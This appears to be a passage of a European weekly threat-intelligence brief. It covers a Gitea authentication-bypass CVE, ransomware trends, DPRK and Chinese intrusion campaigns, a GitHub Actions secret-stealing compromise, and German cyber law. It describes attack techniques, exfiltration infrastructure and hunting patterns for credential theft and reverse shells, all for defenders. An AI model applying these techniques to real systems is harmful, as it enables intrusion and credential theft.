Die Linke (Germany) — Qilin ransomware, 1.5 TB claimed, DPA notified (April 2026)

Gitea 1.26.3 (2026-06-20) and 1.26.4 (2026-06-21) fix a cluster of four flaws; the critical one is CVE-2026-20896 (CVSS 9.8). The official Gitea Docker image shipped with REVERSE_PROXY_TRUSTED_PROXIES defaulting to the wildcard *, meaning Gitea trusts the reverse-proxy authentication header from any source. Any attacker who can reach the container's HTTP port can therefore send an X-WEBAUTH-USER header naming an arbitrary user — including an administrator — and be authenticated as that user with no credentials (Gitea, 2026-06-21; GitHub Security Advisory GHSA-f75j-4cw6-rmx4, 2026-06-21). Bare-metal deployments with an explicit trusted-proxy CIDR are unaffected unless they also set the wildcard. The same release also patches CVE-2026-27775 (protected-branch enforcement race in single-push batch operations), CVE-2026-20779 (CVSS 7.1 — TOTP 2FA bypass via a web-flow TOCTOU race and stateless X-Gitea-OTP replay inside the OTP validity window) and CVE-2026-22874 (SSRF in the webhook / repo-migration subsystems). Germany's BSI issued WID-SEC-2026-2027 on 2026-06-22 rating the set "hoch" (BSI WID, 2026-06-22). No in-the-wild exploitation reported yet; included on the pre-auth-critical-on-widely-deployed-software gate. Gitea is the dominant self-hosted GitHub alternative across DACH/EU public-sector DevOps and sovereign-cloud environments, so an internet-reachable or loosely-segmented Docker instance is an immediate admin-takeover risk (T1190 Exploit Public-Facing Application, T1078.001 Default Accounts). Mitigations: set REVERSE_PROXY_TRUSTED_PROXIES to the exact reverse-proxy IP/CIDR, or disable ENABLE_REVERSE_PROXY_AUTHENTICATION entirely if header-auth is not used; upgrade to 1.26.4. Hunt for admin logins sourced from the reverse-proxy IP with no corresponding password-auth audit entry, and webhook calls to RFC-1918 addresses.

Surfaced this week for its CH/EU-specific findings, Check Point's Q1 2026 ransomware report (published 11 May, not covered in the dailies) documents a structural consolidation: the top 10 groups now hold 71.1% of all leak-site victims, the highest concentration since early 2024 and a reversal of two years of fragmentation — meaning defenders face fewer but more professionalised adversaries (Check Point Research; corroborated by Emsisoft). The Gentlemen grew +315% quarter-on-quarter (explaining this week's Mackay Sugar and GentleKiller coverage in § 2) and LockBit 5.0 resurged +106% on a Rust rewrite. The geography is the operative detail for this audience: Switzerland — Check Point notes Akira accounts for roughly 31% of Swiss ransomware victims, and Germany is the #2 country globally for ransomware victims (Emsisoft). The synthesis a Swiss SOC should take: Akira is the dominant ransomware threat to model against domestically, and the consolidation trend favours investing detection effort against a smaller set of high-capability operators (Qilin, Akira, The Gentlemen, LockBit 5.0).

Proofpoint details UNK_DeadDrop, a North-Korea-aligned cluster (related to but distinct from Contagious Interview / Famous Chollima) that sent 250+ recruitment-themed phishing emails to ~100 finance, crypto, education and technology organisations over April–May 2026 (Proofpoint, 2026-06-15); the targeted geographies are a US majority followed by the UK, Australia, France, Germany and the Netherlands, among others (The Hacker News, 2026-06-16). The lure links to attacker-controlled GitHub/GitLab repositories carrying a .vscode/tasks.json with runOn: folderOpen; VS Code shows a workspace-trust prompt, but Cursor IDE executes the task silently with no prompt, dropping the open-source Overlord Go C2 that steals browser credentials and crypto wallets (The Hacker News, 2026-06-16). Mapped to T1566.002, T1195.001, T1059.004 and T1555.003.

Why it matters to us: public-sector and fintech development teams that have adopted Cursor are exposed to silent execution on repository open. Hunt for editor processes (code, cursor) spawning shell/script interpreters outside build directories (Sysmon EID 1 parent-image filter); enforce workspace-trust policy and restrict VSIX installation to an approved-publisher allowlist via enterprise policy.

Drucksache 21/6134 — "zur Durchführung der Verordnung (EU) 2024/2847" — had its first reading on 11 June, designating Germany's national CRA authorities, notified bodies and enforcement routes, with BSI the anticipated primary market-surveillance authority (Deutscher Bundestag). This is distinct from the general CRA notifying-authority deadline the W23 weekly tracked: it is the German legislative step starting the parliamentary clock (committee stage next, second/third readings and Bundesrat consent expected Q4 2026). The CRA's Chapter IV (notified bodies) entered force EU-wide the same day. What to do differently: Swiss ICT vendors exporting digital products to the German public sector, and German public-sector procurers, should track committee amendments now — the national authority designation determines who you report to and who surveils your products under the CRA.

A coordinated operation led by the US Secret Service, IRS-CI, Europol and Eurojust — with participation from Australia, Canada, France, Georgia, Germany, Iceland, Japan, Poland, Switzerland and the United Kingdom — dismantled AudiA6 on 11 June, a crypto-laundering service trusted by ransomware operations since 2021 (US Secret Service, 2026-06-11). Two men resident in Batumi, Georgia — Ruslan Igorevich Tkachuk (37) and Alexander Vladimirovich Ledenev (25) — were arrested and charged in the Eastern District of Pennsylvania with conspiracy to launder monetary instruments and sting money laundering. Blockchain analysis traced roughly 10,333 BTC (~$389.7 M at transaction-time value) through AudiA6 wallets, with ~393 BTC directly attributable to darknet markets, ransomware crews and cybercrime services; the service charged 3–10 % commission and returned "cleaned" funds within about an hour through chains of fraudulent exchange accounts opened with stolen identities. Europol links AudiA6 to more than 15 international cybercrime investigations and reports infrastructure seizures in the US, Iceland, Germany and France, alongside the seizure of the Dark2Web forum where the service advertised (Europol, 2026-06-11).

Why it matters to us: the takedown removes a monetisation layer used by ransomware groups that target EU and Swiss organisations, and seized transaction records may retrospectively attribute earlier ransom payments — IR teams with open extortion cases should watch for law-enforcement follow-up requests.

The Gentlemen — tracked by Microsoft as Storm-2697 and by PRODAFT as Phantom Mantis / LARVA-368 — has claimed 478 victims on its leak site, with victims concentrated in Thailand, the UK, Brazil, Germany and India (The Hacker News, 2026-06-11). Microsoft's technical dissection details a Go encryptor obfuscated with Garble: per-file ephemeral Curve25519 key pairs with XChaCha20 (the ephemeral public key is appended to each encrypted file after an --eph-- marker), a --spread argument that "turns the malware from a single-host encryptor into a self-propagating worm" — simultaneously abusing network shares, scheduled tasks and remote process execution (T1021.002, T1053.005) — and a --full mode that spawns a SYSTEM-context child via a scheduled task named gentlemen_system (Microsoft Threat Intelligence, 2026-05-28). Defence evasion includes disabling Defender real-time monitoring (T1562.001), re-enabling SMBv1 and registry changes for anonymous share access; persistence runs via UpdateSystem/UpdateUser scheduled tasks and Run keys. On 10 June, KrebsOnSecurity published a deanonymisation tracing the operator handle "Hastalamuerte"/"Zeta88" to a named Russian national in Izhevsk, corroborated by Intel 471, Constella and Flashpoint (KrebsOnSecurity, 2026-06-10). Check Point Research documents the affiliate-favourable 90/10 revenue split and reports affiliates obtaining initial access via Fortinet SSL-VPN credentials (Check Point Research, 2026-05-13). Note: Krebs cites 332 published victims since mid-2025 versus the leak site's 478 claim — see § 7.

Why it matters to us: the initial-access pattern is concrete and huntable — review Fortinet SSL-VPN authentication logs for brute-force sequences followed by a first-time successful logon from a new ASN; alert on scheduled-task creation named gentlemen_system/UpdateSystem/UpdateUser (Windows Event ID 4698) and on shadow-copy deletion; treat SMBv1 re-enablement on any host as a high-confidence compromise signal.

Lumen's Black Lotus Labs reports that the JDY botnet — the reconnaissance cluster that survived the 2024 KV-botnet takedown and is assessed with high confidence to support multiple China-nexus actors including Volt Typhoon — has more than doubled from roughly 650 bots in January 2024 to over 1,500 compromised SOHO and IoT devices (Lumen Black Lotus Labs, 2026-06-10). The botnet now spans Cisco, Araknis, Mimosa Networks, Ubiquiti, Draytek, Hikvision and Linksys devices, performs multiprotocol service fingerprinting, banner-grabbing and TLS-certificate collection at scale, and routes C2 through hidden Tor services while managing victims with the open-source Platypus reverse-shell server. The operationally significant finding: scanning of Fortinet devices spiked within hours of the public disclosure of CVE-2026-35616, demonstrating sub-24-hour integration of new vulnerability intelligence into the recon-to-exploitation pipeline (The Hacker News, 2026-06-10). Targeting centres on US military and associated entities, with distributed European nodes. Technique mapping: T1595.002 Active Scanning: Vulnerability Scanning, T1590 Gather Victim Network Information, T1584.005 Compromise Infrastructure: Botnet.

Why it matters to us: JDY scanning should be treated as a precursor to targeted exploitation, not background noise — the sub-24-hour weaponisation window means CH/EU public-sector and critical-infrastructure operators must compress patch cycles for internet-facing edge appliances to hours, not weeks, after a disclosure. Hunt for outbound connections from edge/SOHO devices to the Platypus default service, unusual high-rate outbound SYN scanning, and unexpected TLS-certificate harvesting.

NCSC Switzerland's Week 23 report (9 June) documents three concurrent technique chains aimed at job seekers in Switzerland (NCSC-CH, 2026-06-09). The first sends fake interview-confirmation emails for plausible Swiss employers, linking to a counterfeit Google login that harvests credentials (T1566.002, T1078). The second uses fraudulent job offers demanding identity documents for "onboarding," with stolen Swiss IDs then used to order goods and run parcel-reshipping (freight-forwarder) fraud. The third operates through compromised LinkedIn recruiter profiles that direct candidates to download a "technical assessment" or "onboarding" GitHub repository carrying infostealer malware that targets crypto wallets, browser cookies and saved credentials (T1566.003, T1059.001, T1555). NCSC notes attackers systematically exploit applicants' urgency and unfamiliarity with new-employer processes to lower vigilance.

Why it matters to us: the LinkedIn→GitHub chain is a credible vector into corporate endpoints via employees in job-search mode and HR/talent teams handling external candidate code. Detection signal: git clone / GitHub downloads followed by script execution minutes after a LinkedIn contact (Sysmon EID 1, parent git.exe / python.exe from a freshly-cloned path). This is a national-CERT primary disclosure for its own jurisdiction.

On 2026-06-03 the five Five Eyes domestic intelligence agencies (ASIO, CSIS, FBI, MI5, NZSIS) released a joint bulletin warning that China's military-intelligence apparatus is systematically using professional-networking and freelance-work platforms — LinkedIn, Indeed, Upwork — to identify and cultivate cleared personnel, academics, researchers and defence/policy staff (MI5; The Record, 2026-06-03; daily 2026-06-06). The tradecraft: operatives pose as recruiters or think-tank staff for fabricated cover companies outside China, open with benign foreign-policy research commissions paying hundreds to a few thousand dollars per deliverable, then escalate toward sensitive material and migrate the relationship to encrypted messaging to reduce platform visibility. Switzerland — outside Five Eyes but a hub for international organisations, financial regulation, and dual-use research — is squarely in the target set. The defensible surface is personnel-security, not EDR: brief cleared and research staff on the innocuous-task-to-sensitive-request progression and give them a low-friction route to report unsolicited foreign-recruitment contact.

Proofpoint reported this week that TA4922, a Chinese-speaking financially-motivated cluster running the highest campaign tempo of any cybercrime actor Proofpoint tracks, pivoted in March–April 2026 to localised campaigns against German, UK, Italian and South African organisations (The Hacker News, 2026-06-04; BleepingComputer, 2026-06-04; daily 2026-06-05). Native-language tax-authority, HR/payroll and invoice lures now pair the known ValleyRAT (Winos 4.0) with newly observed Atlas RAT (C-based), RomulusLoader, and SilentRunLoader (Python infostealer targeting Chrome credentials). A notable TTP shift: conversations are moved to LINE, WhatsApp and Microsoft Teams before payload delivery, pulling targets off enterprise email controls. DACH public-sector and finance staff are in direct scope. Hunt for DLL side-loading chains where AnyDesk/SyncFuture load from unexpected user-profile paths, for Python processes reaching Chrome DPAPI, and for unsolicited inbound contact on Teams/WhatsApp that pivots to a "document."

On 27 May 2026 the German Federal Cabinet adopted the Gesetzentwurf zur Stärkung der Cybersicherheit, now proceeding to Bundestag (German Federal Government, 2026-05-27; Digital Watch Observatory, 2026-05-31). The law grants: the BKA and Bundespolizei authority to shut down or disrupt attacker-controlled infrastructure including servers located outside Germany, reroute data traffic, and collect/modify/delete data on foreign systems; the BSI expanded authority to collect threat-preparation data and require telecoms and major platforms to relay BSI threat warnings to end users. Interior Minister Dobrindt: "In future, we will target the attacker, their servers, their software and their strategy." Personnel implications: BKA +264, Bundespolizei +90, BSI +21 positions by 2030. Civil-society analysis flags constitutional concerns (Basic Law, cross-border state action, jurisdictional conflict with Länder). For DACH/EU defenders: (a) once enacted, telecoms/platform operators gain a new duty-to-relay obligation for BSI warnings; (b) the law sets a precedent for EU active-cyberdefence norms that Swiss forthcoming cyber-resilience legislation (draft expected autumn 2026) will need to address.

On 2026-06-03 the five Five Eyes domestic-intelligence services (ASIO, CSIS, FBI, MI5, NZSIS) released an unusual joint bulletin, Safeguarding Our Secrets, warning that China's military-intelligence apparatus is systematically using professional-networking and freelance-work platforms — LinkedIn, Indeed, Upwork — to identify and cultivate people with access to classified or otherwise privileged information (MI5, 2026-06-03; The Record, 2026-06-03). Operatives pose as recruiters, consultants, HR representatives or think-tank staff for fabricated cover companies outside China, open with benign foreign-policy / defence / trade research commissions paying hundreds to a few thousand dollars per deliverable, then escalate toward sensitive material and migrate the relationship to encrypted messaging to reduce platform visibility. Named target categories include security-clearance holders, military personnel, academics, researchers and journalists.

Why it matters to us: This is a human-intelligence tradecraft advisory rather than a technical-intrusion one, and Switzerland — outside Five Eyes but a hub for international organisations, financial regulation and dual-use research — is squarely in the target set. The defensible surface is personnel-security, not EDR: brief cleared and research staff on the innocuous-task-to-sensitive-request progression, give them a low-friction route to report unsolicited foreign-recruitment contact, and treat unsolicited "paid policy paper" approaches to staff with administrative or network access as a counter-intelligence signal, not a side gig.

ReliaQuest documented OP-512, a previously-unreported China-linked espionage cluster targeting internet-facing Microsoft IIS servers running end-of-life .NET Framework 4.0 (ReliaQuest, 2026-06-05) [SINGLE-SOURCE — ReliaQuest original disclosure]. The framework is a three-component web shell — one .aspx file manager plus two .ashx command handlers — that is per-deployment cryptographically unique (RSA signatures and RC4 keys differ per installation), defeating signature-based detection. It carries a timestomping module that matches shell file timestamps to surrounding legitimate IIS artefacts (T1070.006 Timestomp), uses reflective .NET assembly loading to bypass static scanning (T1620), and implements a novel self-reporting beacon: the deployed shell's URL is hex-encoded into a DNS subdomain query issued from w3wp.exe, so the operator is notified of a live shell without actively scanning for it. ReliaQuest found initial access roughly 75 days before the shell was deployed, consistent with patient espionage tradecraft, and notes overlap with the hex-encoded-DNS technique seen in CL-STA-0048 while assessing OP-512 as a separate cluster.

Why it matters to us: Many Swiss and EU public-sector estates still run legacy IIS/ASP.NET portals and intranet apps on .NET 4.0 — exactly OP-512's stated footprint. The detection lesson is concrete: filesystem timestamps are useless for triage here (timestomped), so hunt on behaviour instead — w3wp.exe issuing long hex-string DNS subdomain queries, w3wp.exe spawning cmd.exe/powershell.exe/csc.exe (Sysmon EID 1), reflective-assembly loads, and .aspx/.ashx writes into web roots (Windows Security EID 4663 on inetsrv paths). Hardening: isolate or retire .NET 4.0 servers and apply WDAC/AppLocker to block execution of unsigned web-root artefacts.

Proofpoint reports that TA4922, a Chinese-speaking, financially-motivated cluster it assesses as running the highest campaign tempo of any cybercrime actor it tracks, expanded in March–April 2026 from its historical Japanese focus to localised campaigns against UK, German, Italian and South African organisations (The Hacker News, 2026-06-04; BleepingComputer, 2026-06-04). Lures are carefully tailored in the target's native language — tax-authority, HR/payroll and invoice themes — and the toolkit now pairs the known ValleyRAT (Winos 4.0) with newly observed families: Atlas RAT (a C-based RAT) and RomulusLoader, which DLL-side-loads (T1574.002) AnyDesk and SyncFuture, plus SilentRunLoader, a Python infostealer pulling Chrome credentials and cookies (T1555.003). A notable TTP shift is the deliberate move of conversations to LINE, WhatsApp and Microsoft Teams to pull targets off enterprise email controls before payload delivery.

Why it matters to us: German and UK targeting with native-language tax/payroll lures puts DACH public-sector and finance staff squarely in scope. Hunt for DLL side-loading chains where trusted binaries (AnyDesk, SyncFuture) load from unexpected working directories, for Python processes reaching DPAPI / Chrome credential stores, and for unsolicited inbound contact on LINE/WhatsApp/Teams that pivots to a "document" — the out-of-band channel is where the email gateway loses visibility.

Unit 42 details Operation FlutterBridge, the evolution of cluster CL-CRI-1089 (active since August 2025), which distributes macOS backdoors disguised as productivity apps (PodcastsLounge, PDF-Brain, PDF-Ninja) via hundreds of Google Ads bought through verified shell companies (Unit 42, 2026-06-02; The Hacker News, 2026-06-04). Every sample was signed with a valid Apple Developer ID and passed notarization, with zero VirusTotal detections at analysis time — Gatekeeper does not catch these. The FlutterShell payload keeps its malicious logic on an attacker-controlled website and uses a Flutter JavaScript-to-native bridge to translate JSON commands into native macOS calls, so capability changes need no new binary. Confirmed behaviour: arbitrary shell execution, file read/write, environment-variable theft, Chrome hijacking via the "Secure Preferences" file, and document exfiltration routed through the attacker's server under the guise of an AI document-summarisation feature. Targeting is global with explicit emphasis on Western Europe, including France and Germany.

Why it matters to us: notarization-bypassed, Developer-ID-signed macOS malware defeats the controls most teams lean on for Mac fleets. The reliable detection layer is behavioural: macOS endpoint telemetry for apps that instantiate a WKWebView with a custom JS message handler that then spawns shell processes, non-browser writes to Chrome's Secure Preferences, and outbound connections from "productivity" apps to CDN-fronted infrastructure.

The FBI issued PSA260527 on 27 May 2026 warning that a Chinese-speaking financially-motivated threat actor tracked by Group-IB as Ghost Stadium has deployed more than 300 phishing sites impersonating fifa.com, all reproducing the official site pixel-for-pixel including a fake single-sign-on authentication flow in multiple languages (FBI IC3 PSA260527, 2026-05-27; BleepingComputer, 2026-05-28). Typosquatted domains span alternative TLDs (.org, .xyz, .live, .sale) and character substitutions; additional fake employment portals impersonate FIFA HR functions. Criminal objectives include credential and financial-data theft via the fake SSO, counterfeit ticket and hospitality sales, fake merchandise and streaming-rights fraud. UK, Germany, Portugal, and Spain are explicitly named as target demographics. Browser-based security controls (Safe Browsing, SmartScreen) do not protect against freshly-registered domains before abuse is reported. For defenders at organisations with large employee populations purchasing World Cup tickets: advise bookmarking https://www.fifa.com directly; treat any search-result-sponsored result for FIFA ticket purchases as unverified. The high-intensity fraud window is the lead-up to the July 19 final.

Wiz CIRT identified and named JINX-0164 on 2026-05-27, a financially motivated cluster active since mid-2025 against cryptocurrency organisations. Initial access is LinkedIn-based social engineering — fake recruiter personas direct targets to fraudulent video-conferencing platforms that deliver AUDIOFIX, a compiled-Python macOS binary functioning as both infostealer and backdoor. AUDIOFIX harvests Keychain contents, Chrome / Firefox / Safari credentials, SSH keys, AWS / GCP / Azure cloud-provider credentials, and credentials from 51 cryptocurrency-wallet browser extensions; persistence is a LaunchAgent plist under ~/Library/LaunchAgents. From the endpoint, JINX-0164 pivots into CI/CD infrastructure using stolen developer credentials and injects poisoned commits under legitimate developer identities; any team member building from the affected branches receives MINIRAT, a lightweight Go-based backdoor. The supply-chain escalation materialised through the @velora-dex/sdk npm package version 4.9.1 (trojanised 2026-04-07), which staged MINIRAT via LaunchCtl persistence. Wiz notes TTP overlap with prior DPRK-adjacent tradecraft (UNC1069, Sapphire Sleet) but stops short of formal attribution. The Hacker News writeup corroborates with additional MINIRAT detail. Mapped to T1566.003 (Spearphishing via Service: LinkedIn), T1543.001 (Launch Agent), T1555 (Credentials from Password Stores), T1195.002 (Compromise Software Supply Chain) and T1098.005 (Device Registration). For Swiss / EU SOCs the relevant exposure is Crypto Valley and any organisation whose developers build from npm dependencies that fan out to internal CI/CD — Sigstore signature verification, lock-file pinning of @velora-dex/sdk, and CI runner least-privilege are the operational asks.

The German federal cabinet approved the Cybersicherheitsstärkungsgesetz (Law to Strengthen Cybersecurity) on 2026-05-27, granting three federal agencies — the Bundeskriminalamt (BKA), the Bundesamt für Sicherheit in der Informationstechnik (BSI) and the Bundespolizei — new authority to conduct what the government frames as active cyber defence rather than offensive hackback (Heise Security, 2026-05-27; onvista / dpa, 2026-05-27; t-online, 2026-05-27). Under the law the agencies may redirect attacker-controlled traffic, selectively intervene in IT systems used to attack Germany, delete or modify data on attacker servers, and shut down dangerous C2 nodes — explicitly including foreign infrastructure. Interior Minister Alexander Dobrindt (CSU) positioned the measure as active cyber defence targeting attacker command-and-control infrastructure rather than retaliatory hackback. The bill funds the order of 350 new positions across the three agencies and approximately €50 million per year in personnel and material (per onvista/dpa; t-online reports a smaller initial figure — see § 7). The Bundesverband der Deutschen Industrie (BDI) and civil-society voices warned of collateral-damage risk on shared hosting and VPN servers and flagged constitutional concerns. The bill next proceeds to the Bundestag; it does not yet have force of law.

Why it matters to us: German LE gaining the legal authority to sinkhole, redirect, or disable attack infrastructure will change the threat-intel attribution picture across Europe. SOC managers should expect that unexplained C2 outages on Germany-adjacent hosting may be LE action rather than malware infrastructure rotation. Threat-intel teams tracking takedown patterns should add de.bka, de.bsi, de.bpol as expected actors in the takedown attribution stack alongside CrowdStrike Counter Adversary Operations, Microsoft DCU and Europol.

The German federal cabinet approved the Cybersicherheitsstärkungsgesetz (Cyber Security Strengthening Act) on 2026-05-27 — the daily caught the Heise news hit; the primary government sources confirm the substance and, importantly, that it is a draft bill still requiring Bundestag passage and is not yet in force. Per the government's framing, it shifts the state from purely defending the target to acting directly against the attacker — "their servers, their software and their strategy" — with the BSI, BKA and Bundespolizei among the bodies gaining expanded authority to detect and counter large-scale, high-damage attacks (the announcement does not break the new powers down per agency in technical detail). For CH/EU defenders the watch item is the cross-border incident-response implication: once in force, German-authority active operations against infrastructure that may be hosted in or transit other jurisdictions raise coordination and deconfliction questions for any SOC running IR across the DACH region. Track the Bundestag passage; nothing changes operationally until it lands.

UPDATE (originally covered weekly 2026-W21): CERT-UA published a bulletin (surfaced 2026-05-22) on a spring-2026 phishing campaign by Ghostwriter (a.k.a. UAC-0057, UNC1151, FrostyNeighbor) targeting Ukrainian government entities through lures themed on the Prometheus online-learning platform (The Hacker News, 2026-05-22 · SC World, 2026-05-22). The material delta from this week's weekly long-running coverage of FrostyNeighbor / Ghostwriter activity is a new three-stage implant trio distinct from the prior PicassoLoader toolset.

Chain: phishing email from a compromised account → PDF attachment with a link to a ZIP archive → ZIP carrying a JavaScript file (OYSTERFRESH). OYSTERFRESH renders a decoy document as cover while writing an obfuscated, RC4-encrypted OYSTERBLUES payload to the Windows Registry and launching OYSTERSHUCK. OYSTERSHUCK decodes OYSTERBLUES (executed via JavaScript) which then collects computer name, user account, OS version, last boot time and running process list, exfiltrates via HTTP POST to C2, and executes dynamically received JavaScript via eval(). The final payload is assessed as Cobalt Strike. (MITRE ATT&CK overlay added by this brief, not by the CERT-UA narrative as carried by The Hacker News: T1027 Obfuscated Files/Information on the OYSTERFRESH stage, T1547.001 Registry Run Keys on the OYSTERBLUES persistence, T1059.007 JavaScript on OYSTERSHUCK execution, T1219 Remote Access Software on the Cobalt Strike final.)

Defender vantage: CERT-UA's own recommendation is to block wscript.exe execution for standard user accounts — a high-yield control because the OYSTER trio relies on script-host execution from user context. EDR signal: wscript.exe spawning powershell.exe or a base64-encoded command; registry monitoring for new HKCU\Software Run-key values containing binary blobs or script paths; hunt for Cobalt Strike beacon signatures in HTTP POST egress to non-corporate domains. The EU/CH relevance is direct: Ghostwriter historically targets Belgium, Germany, Poland, Lithuania, Latvia and other NATO members alongside Ukraine, and the OYSTER implant chain is a toolset upgrade defenders should expect to see surfaced in EU government tenants and Eastern-Europe-focused think tanks.

Threat actors whose TTPs are consistent with Akira ransomware activity successfully bypassed MFA on SonicWall Gen6 SSL-VPN appliances running officially-patched firmware between February and March 2026; SonicWall and incident-response vendors confirm the root cause is that the firmware update for CVE-2024-12802 (CVSS 9.1, AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N) does not by itself enforce MFA on both User Principal Name (user@domain) and SAM-account-name (DOMAIN\user) login formats — six additional manual LDAP-reconfiguration steps from SonicWall KB kA1VN0000000RBd0AM are required (Cybersecurity Dive, 2026-05-20; BleepingComputer, 2026-05-20). Attackers brute-forced credentials against the UPN login path — which accepts authentication without triggering MFA challenges when the LDAP reconfiguration is incomplete — at speed and without producing the standard authentication alerts; per BleepingComputer's reporting, intrusion responders observed sessions of 30 to 60 minutes during which attackers logged in, performed network reconnaissance, tested credential reuse on internal systems and logged out. Gen6 SSL-VPN reached end-of-life on 2026-04-16 and receives no further security updates; Gen7 and Gen8 are remediated by firmware update alone. Why it matters to us: the technique is a textbook example of why CVSS / vendor-advised patch status is insufficient operational signal — the appliance shows patched-firmware version, MFA appears enabled in the admin UI, and authentications succeed against an alternative account-name format that bypasses the policy enforcement entirely. Detection concept — SonicWall Gen6 SSL-VPN syslog filter for successful SSL-VPN authentications where the login field is UPN-format rather than SAM-format, especially from source IPs with high authentication-attempt volume; correlate with short-duration recon-and-credential-reuse sessions consistent with the 30-to-60-minute pattern BleepingComputer documents. Hardening — complete every step in SonicWall KB kA1VN0000000RBd0AM; given Gen6 EoL, migrate to Gen7/Gen8 on a defined cut-over timeline.

StepSecurity disclosed on 2026-05-18 that all 53 existing version tags of the popular actions-cool/issues-helper GitHub Action were moved to point to an imposter commit (1c9e803) not present in the action's normal branch history, with 15 tags on the companion actions-cool/maintain-one-comment action manipulated in the same operation. The malicious payload downloads the Bun JavaScript runtime to the runner, then spawns a Python process that reads the /proc/<PID>/mem address space of the Runner.Worker process — the GitHub Actions component that holds decrypted workflow secrets during job execution. Captured bytes are filtered via tr + grep for values marked isSecret: true and exfiltrated over HTTPS to t.m-kosche[.]com. Socket confirmed the exfiltration domain overlaps with the Mini Shai-Hulud npm / PyPI campaign cluster (The Hacker News, 2026-05-19). All 53 imposter commits were created within a 3-minute 16-second window; GitHub has since disabled the repository.

Any workflow that referenced actions-cool/issues-helper@v* or a mutable tag during the 2026-05-18 attack window should be treated as a compromised CI/CD pipeline — rotate GitHub PATs, npm tokens, AWS credentials, SSH keys, and any other secret exposed via ${{ secrets.* }} to that workflow. Maps to T1195.002 (Compromise Software Supply Chain) and T1552.001 (Credentials in Files).

Why it matters to us: EU and Swiss developer organisations using GitHub Actions for public-sector software supply chains were directly in scope during the attack window. The mitigation is enforcement of commit-SHA pinning for every third-party Action reference (uses: actions-cool/issues-helper@<full-sha> rather than @v2 or @main) and runtime enforcement of allow-listed outbound network destinations from runners (StepSecurity Harden-Runner, GitHub-native egress filtering).

If you did nothing this week: patching alone did not close this. Actors whose TTPs match Akira ransomware successfully bypassed MFA on SonicWall Gen6 SSL-VPN appliances running officially-patched firmware between February and March 2026, by abusing a UPN/SAM account-name split in the authentication path — covered 2026-05-21.

This is an incomplete-patch case (CVE-2024-12802, CVSS 9.1): the original fix did not fully remediate the MFA-bypass path, so a "patched" appliance can still be brute-forced through the account-name-split primitive. Swiss/EU public-sector and finance estates that treated the earlier SonicWall advisory as closed should re-open it: audit SSL-VPN authentication logs for UPN-vs-SAM mismatches and repeated MFA challenges, and confirm the appliance is on the firmware build that fully closes CVE-2024-12802 rather than the earlier partial fix.

BKA arrested Dream Market lead administrator "Speedstepper" in Germany; OPSEC failure traced to cryptocurrency-to-physical-gold conversion patterns (daily 2026-05-16). Complements the W20 BKA Crimenetwork takedown (daily 2026-05-12) — two consecutive German federal LE actions against darknet-market administrative-tier operators in the same week. For European cybercrime ecosystem analysis: the BKA tempo on darknet-administrator pursuit is materially elevated through Q2 2026 and likely informs the broader operator OPSEC environment.

Check Point's April 2026 monthly threat report (published early May 2026) confirms Qilin / Agenda leading all ransomware operators with 15% of 707 published attacks in April; Germany is the third-most-targeted country globally at 5.0% of victims (US 41.6%); Europe accounts for 27% of ransomware victims globally. Sector targeting in April 2026: Business Services (33.8%), healthcare, manufacturing. The Gentlemen — despite the May 4 backend breach — remained in the top-7 operators with 320+ victims (Check Point Research, 2026-05-08). The synthesis the dailies did not yet absorb: Germany's 5% share of global ransomware victims is materially elevated compared to the 2024–2025 baseline (~2–3%); the Qilin DLS lists 65 German victims total as of 2026-05-16 (Check Point blog, dataset reference). For Swiss defenders: CH-DE cross-border operations (Swiss subsidiaries in DE, German subsidiaries of Swiss parents) inherit the German exposure level; this is the empirical basis for a DACH-region threat-modelling premium on ransomware-readiness exercises.

W19 long-running record (item:qilin-agenda-raas-die-linke-confirms-q2-2026-german-activity) tracked Qilin's continued German activity. W20 status: Check Point's April 2026 report confirms Qilin leads all RaaS operators at 15% of 707 published attacks in April; Germany's share at 5% of global ransomware victims is the elevated-DACH-exposure data point (Qilin DLS German-victim count cited by W1 horizon research as approximately 65 as of 2026-05-16 — uncorroborated leak-site enumeration that should be treated as a lower bound); Die Linke (German political party) confirmed Qilin compromise in March 2026 (W19 carry-over); no new Swiss-specific victim named in window (Check Point Research).

The KRITIS-DachG (Kritis-Dachgesetz, Germany's critical-infrastructure umbrella act) entered into force; the initial registration deadline of 17 July 2026 is now 61 days away. Operators of critical facilities in scope — including public-administration entities operating infrastructure in the sectors of energy, transport, finance, IT/telecommunications, space-ground infrastructure, and public administration — must register with the Federal Office of Civil Protection and Disaster Assistance (BBK) via an electronic platform jointly operated with the BSI. Registration requires operator name, legal form, commercial register number, address including public IP ranges, sector / industry classification, and critical-facility contact details. Violations constitute an administrative offence punishable by fines up to EUR 500,000. Public-sector IT departments in Germany should verify whether their IT and OT infrastructure qualifies as a "critical facility" under the KRITIS-DachG sector thresholds, register before 17 July 2026 or within three months of later qualification, and identify which services they must report under the act's disruption-reporting obligations to BBK / BSI (24-hour initial notification, 72-hour detailed report). Swiss federal entities with German subsidiaries or cross-border infrastructure should verify German subsidiary obligations (Luther Lawfirm; A&O Shearman).

Adds to the BKA Crimenetwork takedown (covered daily 2026-05-12 as a separate W20 LE action). Two consecutive German federal LE actions against darknet-administrator-tier operators within the same week — a notable tempo signal for the EU cybercrime LE ecosystem. The OPSEC failure (cryptocurrency-to-physical-gold conversion patterns over seven years) is forensically interesting but the policy-horizon implication is that BKA's investigative throughput on darknet-administrator pursuits is materially elevated through Q2 2026 (daily 2026-05-16).

Kaspersky's Global Research and Analysis Team published a deep technical disclosure on 2026-05-14 covering Kimsuky (Ruby Sleet / APT43) campaigns observed during late 2025 and Q1 2026, documenting six malware families the actor is currently rotating (Kaspersky Securelist, 2026-05-14). The headline novelty is HelloDoor, the first Rust-based variant in the PebbleDash family (a backdoor platform Kimsuky appropriated from Lazarus around 2021); secondary additions are httpMalice (HTTP-only loader), MemLoad (reflective DLL loader), httpTroy (C2 backdoor) and continued use of AppleSeed / HappyDoor. The most operationally significant capability change is that HelloDoor's C2 channel uses Cloudflare Quick Tunnels via TryCloudflare — short-lived *.trycloudflare.com hostnames issued ad-hoc, terminating attacker control infrastructure behind Cloudflare's CDN, eliminating fixed C2 IPs and making network-layer indicator blocking impractical. Kaspersky verbatim: "Kimsuky has continuously introduced new malware variants based on the PebbleDash platform, a tool historically leveraged by the Lazarus Group but appropriated by Kimsuky since at least 2021... including the use of VSCode Tunneling, Cloudflare Quick Tunnels, DWAgent, large language models (LLMs), and the Rust programming language." Reported targeting: South Korean government, defence and medical sectors as the primary set, with documented spillover hits in Germany — the closest geographic proximity to Swiss government targets in recent Kimsuky reporting. Detection guidance from Kaspersky (paraphrased to avoid IOC 